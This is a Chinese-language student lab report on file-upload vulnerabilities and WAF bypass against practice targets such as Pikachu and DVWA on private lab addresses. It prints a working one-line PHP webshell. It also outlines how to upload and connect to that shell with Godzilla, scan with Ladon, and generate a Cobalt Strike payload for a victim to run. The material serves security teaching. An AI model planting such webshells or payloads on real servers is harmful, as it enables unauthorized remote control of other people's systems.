网络空间安全综合实践 - 文件上传 WAF 绕过实验:详细步骤与实战技巧

一句话木马编写

<?php @eval($_POST['cmd']);phpinfo(); ?>

webshell 的连接工具

如何连接 webshell

第一步:上传木马文件到目标服务器中

第二步:需要访问木马

第三步:连接木马文件

第四步:shell 管理

实验测试

2003 的导入虚拟机

写木马文件

访问木马

连接木马

哥斯拉的使用

ladon 扫描器

文件上传

http://172.20.69.110/pikachu/
http://172.20.69.110/dvwa/login.php
http://172.20.69.110/sqlit/
http://172.20.69.110/
http://172.20.69.110/phpmyadmin/
http://172.20.69.110/ekucms2.5/

第一步:确定目标地址

http://172.20.69.99:89/pikachu-master/pikachu-master/vul/unsafeupload/servercheck.php

第二步:尝试上传文件

http://172.20.69.99:89/pikachu-master/pikachu-master/vul/unsafeupload/uploads/shell.jpg

第三步:抓取上传数据包

第四步:更改数据包

第五步:访问目标

第六步:shell 连接

CS 的工具

工具下载

启动工具

第一步:打开 CS 的客户端

第二步:部署服务器端

任务:打开 cs.bat

CS 木马生成

第一步:设置监听器

第二步:设置 CS 马

第三步:让被攻击者运行此文件,受害主机上线(双击)

第四步:使用插件增强

实验心得与小结

本次实验主要学习了文件上传漏洞的原理和实践,以及如何利用一句话木马和 webshell 来获取被攻击者的权限。同时,还学习了使用哥斯拉和 ladon 扫描器来发现目标漏洞,以及使用 CS 工具生成木马文件。总的来说,本次实验让我更深入地了解了网络安全的相关概念和实践技巧,对提高网络安全意识和技能有很大的帮助。

网络空间安全综合实践 - 文件上传 WAF 绕过实验:详细步骤与实战技巧

原文地址: https://www.cveoy.top/t/topic/oYdB 著作权归作者所有。请勿转载和采集!

免费AI点我,无需注册和登录